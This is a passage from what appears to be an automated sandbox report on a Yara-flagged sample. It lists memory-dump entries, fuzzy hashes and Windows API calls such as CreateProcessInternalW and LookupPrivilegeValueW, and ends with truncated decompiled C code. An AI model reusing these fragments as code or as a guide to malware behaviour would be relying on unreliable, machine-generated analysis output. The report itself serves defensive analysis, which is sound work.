                                      • Associated: 0000000B.00000002.666404273.0000000002674000.00000040.00000001.sdmp
                                      • Associated: 0000000B.00000002.666410428.0000000002677000.00000040.00000001.sdmp
                                      • Associated: 0000000B.00000002.666416577.0000000002680000.00000040.00000001.sdmp
                                      • Associated: 0000000B.00000002.666452455.00000000026E0000.00000040.00000001.sdmp
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                      • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                                      • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                      • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.666311106.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true
                                      • Associated: 0000000B.00000002.666303464.0000000002570000.00000040.00000001.sdmp
                                      • Associated: 0000000B.00000002.666389570.0000000002660000.00000040.00000001.sdmp
                                      • Associated: 0000000B.00000002.666397028.0000000002670000.00000040.00000001.sdmp
                                      • Associated: 0000000B.00000002.666404273.0000000002674000.00000040.00000001.sdmp
                                      • Associated: 0000000B.00000002.666410428.0000000002677000.00000040.00000001.sdmp
                                      • Associated: 0000000B.00000002.666416577.0000000002680000.00000040.00000001.sdmp
                                      • Associated: 0000000B.00000002.666452455.00000000026E0000.00000040.00000001.sdmp
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                      • Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
                                      • Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                      • Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.666311106.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true
                                      • Associated: 0000000B.00000002.666303464.0000000002570000.00000040.00000001.sdmp
                                      • Associated: 0000000B.00000002.666389570.0000000002660000.00000040.00000001.sdmp
                                      • Associated: 0000000B.00000002.666397028.0000000002670000.00000040.00000001.sdmp
                                      • Associated: 0000000B.00000002.666404273.0000000002674000.00000040.00000001.sdmp
                                      • Associated: 0000000B.00000002.666410428.0000000002677000.00000040.00000001.sdmp
                                      • Associated: 0000000B.00000002.666416577.0000000002680000.00000040.00000001.sdmp
                                      • Associated: 0000000B.00000002.666452455.00000000026E0000.00000040.00000001.sdmp
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                      • Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
                                      • Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                      • Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.666311106.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true
                                      • Associated: 0000000B.00000002.666303464.0000000002570000.00000040.00000001.sdmp
                                      • Associated: 0000000B.00000002.666389570.0000000002660000.00000040.00000001.sdmp
                                      • Associated: 0000000B.00000002.666397028.0000000002670000.00000040.00000001.sdmp
                                      • Associated: 0000000B.00000002.666404273.0000000002674000.00000040.00000001.sdmp
                                      • Associated: 0000000B.00000002.666410428.0000000002677000.00000040.00000001.sdmp
                                      • Associated: 0000000B.00000002.666416577.0000000002680000.00000040.00000001.sdmp
                                      • Associated: 0000000B.00000002.666452455.00000000026E0000.00000040.00000001.sdmp
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                      • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                                      • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                      • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.666311106.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true
                                      • Associated: 0000000B.00000002.666303464.0000000002570000.00000040.00000001.sdmp
                                      • Associated: 0000000B.00000002.666389570.0000000002660000.00000040.00000001.sdmp
                                      • Associated: 0000000B.00000002.666397028.0000000002670000.00000040.00000001.sdmp
                                      • Associated: 0000000B.00000002.666404273.0000000002674000.00000040.00000001.sdmp
                                      • Associated: 0000000B.00000002.666410428.0000000002677000.00000040.00000001.sdmp
                                      • Associated: 0000000B.00000002.666416577.0000000002680000.00000040.00000001.sdmp
                                      • Associated: 0000000B.00000002.666452455.00000000026E0000.00000040.00000001.sdmp
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                      • Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
                                      • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                      • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.666311106.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true
                                      • Associated: 0000000B.00000002.666303464.0000000002570000.00000040.00000001.sdmp
                                      • Associated: 0000000B.00000002.666389570.0000000002660000.00000040.00000001.sdmp
                                      • Associated: 0000000B.00000002.666397028.0000000002670000.00000040.00000001.sdmp
                                      • Associated: 0000000B.00000002.666404273.0000000002674000.00000040.00000001.sdmp
                                      • Associated: 0000000B.00000002.666410428.0000000002677000.00000040.00000001.sdmp
                                      • Associated: 0000000B.00000002.666416577.0000000002680000.00000040.00000001.sdmp
                                      • Associated: 0000000B.00000002.666452455.00000000026E0000.00000040.00000001.sdmp
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                      • Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
                                      • Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                      • Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.666311106.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true
                                      • Associated: 0000000B.00000002.666303464.0000000002570000.00000040.00000001.sdmp
                                      • Associated: 0000000B.00000002.666389570.0000000002660000.00000040.00000001.sdmp
                                      • Associated: 0000000B.00000002.666397028.0000000002670000.00000040.00000001.sdmp
                                      • Associated: 0000000B.00000002.666404273.0000000002674000.00000040.00000001.sdmp
                                      • Associated: 0000000B.00000002.666410428.0000000002677000.00000040.00000001.sdmp
                                      • Associated: 0000000B.00000002.666416577.0000000002680000.00000040.00000001.sdmp
                                      • Associated: 0000000B.00000002.666452455.00000000026E0000.00000040.00000001.sdmp
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                      • Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
                                      • Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                      • Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.666311106.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true
                                      • Associated: 0000000B.00000002.666303464.0000000002570000.00000040.00000001.sdmp
                                      • Associated: 0000000B.00000002.666389570.0000000002660000.00000040.00000001.sdmp
                                      • Associated: 0000000B.00000002.666397028.0000000002670000.00000040.00000001.sdmp
                                      • Associated: 0000000B.00000002.666404273.0000000002674000.00000040.00000001.sdmp
                                      • Associated: 0000000B.00000002.666410428.0000000002677000.00000040.00000001.sdmp
                                      • Associated: 0000000B.00000002.666416577.0000000002680000.00000040.00000001.sdmp
                                      • Associated: 0000000B.00000002.666452455.00000000026E0000.00000040.00000001.sdmp
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                      • Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
                                      • Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                      • Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.666311106.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true
                                      • Associated: 0000000B.00000002.666303464.0000000002570000.00000040.00000001.sdmp
                                      • Associated: 0000000B.00000002.666389570.0000000002660000.00000040.00000001.sdmp
                                      • Associated: 0000000B.00000002.666397028.0000000002670000.00000040.00000001.sdmp
                                      • Associated: 0000000B.00000002.666404273.0000000002674000.00000040.00000001.sdmp
                                      • Associated: 0000000B.00000002.666410428.0000000002677000.00000040.00000001.sdmp
                                      • Associated: 0000000B.00000002.666416577.0000000002680000.00000040.00000001.sdmp
                                      • Associated: 0000000B.00000002.666452455.00000000026E0000.00000040.00000001.sdmp
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                      • Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
                                      • Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                      • Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • Sleep.KERNELBASE(000007D0), ref: 000A9138
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.665478819.0000000000090000.00000040.00020000.sdmp, Offset: 00090000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: Sleep
                                      • String ID: net.dll$wininet.dll
                                      • API String ID: 3472027048-1269752229
                                      • Opcode ID: 02f3b4d2928c7c566df143da585756ded651651eb2d623a4753e324fa4d4efdd
                                      • Instruction ID: fa91c5ccc115770621961957067327bdc420cade51a15a66fcba41ef5b31088e
                                      • Opcode Fuzzy Hash: 02f3b4d2928c7c566df143da585756ded651651eb2d623a4753e324fa4d4efdd
                                      • Instruction Fuzzy Hash: C33184B6600745BBC724DFA4C885FA7B7F8BB49B00F10851DF62A6B246DB70B550CBA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • Sleep.KERNELBASE(000007D0), ref: 000A9138
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.665478819.0000000000090000.00000040.00020000.sdmp, Offset: 00090000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: Sleep
                                      • String ID: net.dll$wininet.dll
                                      • API String ID: 3472027048-1269752229
                                      • Opcode ID: bdc1c7ee38170e1901dbfb4b710023cf5f40ada956a8e647feb0b32eb301ca7b
                                      • Instruction ID: 6c9a0b8b2a1d7a99f9d263de95e00fe963ab431fc3baa306db02d102a190297a
                                      • Opcode Fuzzy Hash: bdc1c7ee38170e1901dbfb4b710023cf5f40ada956a8e647feb0b32eb301ca7b
                                      • Instruction Fuzzy Hash: 8C2194B2A00201ABDB24DFA4C885FABB7F4FB89700F10811DF6296F246D775A550CBA5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00093AF8), ref: 000AA6AD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.665478819.0000000000090000.00000040.00020000.sdmp, Offset: 00090000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: FreeHeap
                                      • String ID: .z`
                                      • API String ID: 3298025750-1441809116
                                      • Opcode ID: c2228c3a1741d68def62fa8a3cbf0f6062af880cba708a0a07a73eebb076bc35
                                      • Instruction ID: 13a1d05b5b8335535bbc6e995ae1c3167c321111485370622896c45f9d181b74
                                      • Opcode Fuzzy Hash: c2228c3a1741d68def62fa8a3cbf0f6062af880cba708a0a07a73eebb076bc35
                                      • Instruction Fuzzy Hash: DDE09AB6600204AFCB18EFA4DD88EE737A9EF88760F044559FD095B292C630E900CBA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • RtlAllocateHeap.NTDLL(6E,?,000A4CAF,000A4CAF,?,000A4536,?,?,?,?,?,00000000,00000000,?), ref: 000AA66D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.665478819.0000000000090000.00000040.00020000.sdmp, Offset: 00090000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: AllocateHeap
                                      • String ID: 6E
                                      • API String ID: 1279760036-2994475630
                                      • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                      • Instruction ID: 73bdb664f69e471437e247e598b1b4702f5545d24e59a463deeb9c45e47ad1d9
                                      • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                      • Instruction Fuzzy Hash: 46E012B1200208ABDB18EF99CC41EA777ACAF88654F118558BA085B282C630F910CAB0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00093AF8), ref: 000AA6AD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.665478819.0000000000090000.00000040.00020000.sdmp, Offset: 00090000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: FreeHeap
                                      • String ID: .z`
                                      • API String ID: 3298025750-1441809116
                                      • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                      • Instruction ID: 114e9eb2bbb0bec9ae2018608eee28d91e3c0cc78abd8b7e718643e05dc11103
                                      • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                      • Instruction Fuzzy Hash: CAE012B1200208ABDB18EF99CC49EA777ACAF88750F018558BA085B292C630E910CAB0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0009836A
                                      • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0009838B
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.665478819.0000000000090000.00000040.00020000.sdmp, Offset: 00090000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: MessagePostThread
                                      • String ID:
                                      • API String ID: 1836367815-0
                                      • Opcode ID: dda4c1d86a00857a09575031e913dfb0291cb2a84426fe791074dc8bd483109a
                                      • Instruction ID: 819c3dbc57a401ee2c45d92f14e5ed45d1f78a9c9ea4bbd470b55d6de048370c
                                      • Opcode Fuzzy Hash: dda4c1d86a00857a09575031e913dfb0291cb2a84426fe791074dc8bd483109a
                                      • Instruction Fuzzy Hash: C501D831A802197AEB20D6949C43FFE776CAB41F51F054215FB04BA1C2DAA46A0647E1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0009836A
                                      • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0009838B
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.665478819.0000000000090000.00000040.00020000.sdmp, Offset: 00090000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: MessagePostThread
                                      • String ID:
                                      • API String ID: 1836367815-0
                                      • Opcode ID: 6fa9e2466c940b1058e4d170af7c8c65c6e2faa198094bd898fc85c99061f236
                                      • Instruction ID: 8edc6710b314c7cae1d5775333a1445e6ac2910715860e903e446fea76c6ae49
                                      • Opcode Fuzzy Hash: 6fa9e2466c940b1058e4d170af7c8c65c6e2faa198094bd898fc85c99061f236
                                      • Instruction Fuzzy Hash: 7201DB31A8022877EB20A6949C03FFE776C5B41F50F054114FF04BA1C3EAD46A0547F6
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0009AD62
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.665478819.0000000000090000.00000040.00020000.sdmp, Offset: 00090000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: Load
                                      • String ID:
                                      • API String ID: 2234796835-0
                                      • Opcode ID: 117e98a4e37819197d72653e81a0359815b405dad333ed2bc3a335427f0668ee
                                      • Instruction ID: dfc1b78062b8f68086019292ecd9de6f94707042da2383880e24d998790c43fb
                                      • Opcode Fuzzy Hash: 117e98a4e37819197d72653e81a0359815b405dad333ed2bc3a335427f0668ee
                                      • Instruction Fuzzy Hash: 6C011EB5E0020DABDF10EAE4DC42FDDB7B89B55708F004595E90997642F631EB149B92
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 000AA744
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.665478819.0000000000090000.00000040.00020000.sdmp, Offset: 00090000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: CreateInternalProcess
                                      • String ID:
                                      • API String ID: 2186235152-0
                                      • Opcode ID: 06858311f6440f041b58a09ebc3de278bc746520fab489ad4a5fc817f763bf5e
                                      • Instruction ID: 6d951b5f4c979c9f3234d69eb76305433643f9107aa50d565203aec9f4a797fa
                                      • Opcode Fuzzy Hash: 06858311f6440f041b58a09ebc3de278bc746520fab489ad4a5fc817f763bf5e
                                      • Instruction Fuzzy Hash: 8E01AFB2204108AFCB58DF89DC80EEB37A9AF8C754F158258BA0DD7255D630EC51CBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 000AA744
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.665478819.0000000000090000.00000040.00020000.sdmp, Offset: 00090000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: CreateInternalProcess
                                      • String ID:
                                      • API String ID: 2186235152-0
                                      • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                      • Instruction ID: 700b7eb715e2ba4f21a51367b0e088b4d2ae1d0eb8b8db4f8cdec3b3ac9aed10
                                      • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                      • Instruction Fuzzy Hash: 6E01AFB2210108AFCB58DF89DC80EEB77ADAF8C754F158258BA0D97251C630E851CBA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0009F050,?,?,00000000), ref: 000A91FC
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.665478819.0000000000090000.00000040.00020000.sdmp, Offset: 00090000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: CreateThread
                                      • String ID:
                                      • API String ID: 2422867632-0
                                      • Opcode ID: f12d56d8ec8a2bb26070781c71241223565a01734460e95afd95452107832b6b
                                      • Instruction ID: 32a2cb0c1b2b1780e3ebe99512e8ca51f54f072f2eb46a2b985bf01ae086b643
                                      • Opcode Fuzzy Hash: f12d56d8ec8a2bb26070781c71241223565a01734460e95afd95452107832b6b
                                      • Instruction Fuzzy Hash: 5FE06D373802043AE22065D9AC02FE7B39C9B82B21F140026FA0DEB2C2D595F80142A5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0009F050,?,?,00000000), ref: 000A91FC
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.665478819.0000000000090000.00000040.00020000.sdmp, Offset: 00090000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: CreateThread
                                      • String ID:
                                      • API String ID: 2422867632-0
                                      • Opcode ID: 0172dfa19f74ce7a628134897db47104daaa4d8c6f85f4602b2b9d174cd27a92
                                      • Instruction ID: 4d0610bc319638655fbe46dc42a527256573bb42aefa1dc48acb40ca7dbd17ea
                                      • Opcode Fuzzy Hash: 0172dfa19f74ce7a628134897db47104daaa4d8c6f85f4602b2b9d174cd27a92
                                      • Instruction Fuzzy Hash: F7F0E5362A02003AE23166989C03FE377999F92B11F580019FA48BB3C2D5A5F94143A9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,0009F1D2,0009F1D2,?,00000000,?,?), ref: 000AA810
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.665478819.0000000000090000.00000040.00020000.sdmp, Offset: 00090000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: LookupPrivilegeValue
                                      • String ID:
                                      • API String ID: 3899507212-0
                                      • Opcode ID: 71fdbf0e167b1f374111f4436362fb19b60290f1df1f27626b5b28b93e954d9d
                                      • Instruction ID: 4c594acbdfd53f7e002d0e10bda2295a3998777d9a0f3859eb41aaab26337b2e
                                      • Opcode Fuzzy Hash: 71fdbf0e167b1f374111f4436362fb19b60290f1df1f27626b5b28b93e954d9d
                                      • Instruction Fuzzy Hash: ECF0A0B13002146FCB14DF88CC84EEB7B6AEF89350F148095F9089B282D630E910CBF4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,0009F1D2,0009F1D2,?,00000000,?,?), ref: 000AA810
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.665478819.0000000000090000.00000040.00020000.sdmp, Offset: 00090000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: LookupPrivilegeValue
                                      • String ID:
                                      • API String ID: 3899507212-0
                                      • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                      • Instruction ID: 08d619a759526c68e9e2401cd5f567b517204a422b819a6d37bcae87e853081f
                                      • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                      • Instruction Fuzzy Hash: B2E01AB12002086BDB14DF89CC85EE737ADAF89650F018164BA0857242CA30E8108BF5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • SetErrorMode.KERNELBASE(00008003,?,00098D14,?), ref: 0009F6FB
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.665478819.0000000000090000.00000040.00020000.sdmp, Offset: 00090000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorMode
                                      • String ID:
                                      • API String ID: 2340568224-0
                                      • Opcode ID: b894b85e471362e4b4b601cdc184ec6d8a2c7ffee4f558636a8ef7911e72c19a
                                      • Instruction ID: c202ce0f26444d32fb00e57f3cdb4b8ed80ef1ccf5b597d54c4ccbdac3138c6f
                                      • Opcode Fuzzy Hash: b894b85e471362e4b4b601cdc184ec6d8a2c7ffee4f558636a8ef7911e72c19a
                                      • Instruction Fuzzy Hash: ADD05E656503092AEA10EAA49C03F6632C86B45B04F490064F948D62C3D990F4004165
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Non-executed Functions

                                      C-Code - Quality: 94%
                                      			E025B8788(signed int __ecx, void* __edx, signed int _a4) {
                                      				signed int _v8;
                                      				short* _v12;
                                      				void* _v16;
                                      				signed int _v20;
                                      				char _v24;
                                      				signed int _v28;
                                      				signed int _v32;
                                      				char _v36;
                                      				signed int _v40;
                                      				char _v44;
                                      				signed int _v48;
                                      				signed int _v52;
                                      				signed int _v56;
                                      				signed int _v60;
                                      				char _v68;
                                      				void* _t216;
                                      				intOrPtr _t231;
                                      				short* _t235;
                                      				intOrPtr _t257;
                                      				short* _t261;
                                      				intOrPtr _t284;
                                      				intOrPtr _t288;
                                      				void* _t314;
                                      				signed int _t318;
                                      				short* _t319;
                                      				intOrPtr _t321;
                                      				void* _t328;
                                      				void* _t329;
                                      				char* _t332;
                                      				signed int _t333;
                                      				signed int* _t334;
                                      				void* _t335;
                                      				void* _t338;
                                      				void* _t339;
                                      
                                      				_t328 = __edx;
                                      				_t322 = __ecx;
                                      				_t318 = 0;
                                      				_t334 = _a4;
                                      				_v8 = 0;
                                      				_v28 = 0;
                                      				_v48 = 0;
                                      				_v20 = 0;
                                      				_v40 = 0;
                                      				_v32 = 0;
                                      				_v52 = 0;
                                      				if(_t334 == 0) {
                                      					_t329 = 0xc000000d;
                                      					L49:
                                      					_t334[0x11] = _v56;
                                      					 *_t334 =  *_t334 | 0x00000800;
                                      					_t334[0x12] = _v60;
                                      					_t334[0x13] = _v28;
                                      					_t334[0x17] = _v20;
                                      					_t334[0x16] = _v48;
                                      					_t334[0x18] = _v40;
                                      					_t334[0x14] = _v32;
                                      					_t334[0x15] = _v52;
                                      					return _t329;
                                      				}
                                      				_v56 = 0;
                                      				if(E025B8460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
                                      					_v56 = 1;
                                      					if(_v8 != 0) {
                                      						_t207 = E0259E025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
                                      					}
                                      					_push(1);
                                      					_v8 = _t318;
                                      					E025B718A(_t207);
                                      					_t335 = _t335 + 4;
                                      				}
                                      				_v60 = _v60 | 0xffffffff;
                                      				if(E025B8460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
                                      					_t333 =  *_v8;
                                      					_v60 = _t333;
                                      					_t314 = E0259E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                      					_push(_t333);
                                      					_v8 = _t318;
                                      					E025B718A(_t314);
                                      					_t335 = _t335 + 4;
                                      				}
                                      				_t216 = E025B8460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
                                      				_t332 = ";";
                                      				if(_t216 < 0) {
                                      					L17:
                                      					if(E025B8460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
                                      						L30:
                                      						if(E025B8460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
                                      							L46:
                                      							_t329 = 0;
                                      							L47:
                                      							if(_v8 != _t318) {
                                      								E0259E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                      							}
                                      							if(_v28 != _t318) {
                                      								if(_v20 != _t318) {
                                      									E0259E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
                                      									_v20 = _t318;
                                      									_v40 = _t318;
                                      								}
                                      							}
                                      							goto L49;
                                      						}
                                      						_t231 = _v24;
                                      						_t322 = _t231 + 4;
                                      						_push(_t231);
                                      						_v52 = _t322;
                                      						E025B718A(_t231);
                                      						if(_t322 == _t318) {
                                      							_v32 = _t318;
                                      						} else {
